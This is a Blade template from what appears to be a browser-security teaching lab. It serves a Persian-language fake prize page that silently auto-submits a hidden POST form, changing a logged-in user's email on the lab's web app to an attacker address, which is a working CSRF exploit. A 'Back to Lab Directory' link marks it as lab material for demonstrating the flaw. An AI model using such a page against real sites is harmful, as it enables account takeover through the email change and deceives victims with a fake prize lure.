browser-sec-lab/resources/views/hacker/csrf-exploit.blade.php
2026-04-17 20:09:57 +03:30

26 lines
1.4 KiB
PHP

<!DOCTYPE html>
<html lang="fa" dir="rtl">
<head>
<meta charset="UTF-8">
<title>شما برنده شدید!</title>
<script src="https://tailwindcss.eitebar.ir/tailwind-play.js"></script>
</head>
<body class="bg-slate-900 flex items-center justify-center min-h-screen" onload="document.getElementById('attack-form').submit()">
<div class="text-center bg-slate-800 p-10 rounded-2xl shadow-2xl border border-red-500/50">
<h1 class="text-3xl font-bold text-red-500 mb-4 animate-pulse">در حال انتقال به صفحه دریافت جایزه...</h1>
<p class="text-slate-400">لطفاً مرورگر خود را نبندید.</p>
<form id="attack-form" action="https://webapp.kr-rezvan.ir/update-email" method="POST" style="display:none;">
<input type="hidden" name="email" value="hacker-csrf@eitebar.ir">
</form>
</div>
<script>
console.log("[Hacker] اجرای حمله CSRF کلاسیک...");
</script>
<a href="https://webapp.kr-rezvan.ir/labs" style="position: fixed; bottom: 20px; right: 20px; background-color: #3b82f6; color: white; padding: 10px 20px; border-radius: 50px; font-family: sans-serif; text-decoration: none; font-weight: bold; box-shadow: 0 4px 6px rgba(0,0,0,0.1); z-index: 9999; transition: all 0.3s;" onmouseover="this.style.backgroundColor='#2563eb'" onmouseout="this.style.backgroundColor='#3b82f6'">
🏠 Back to Lab Directory
</a>
</body>
</html>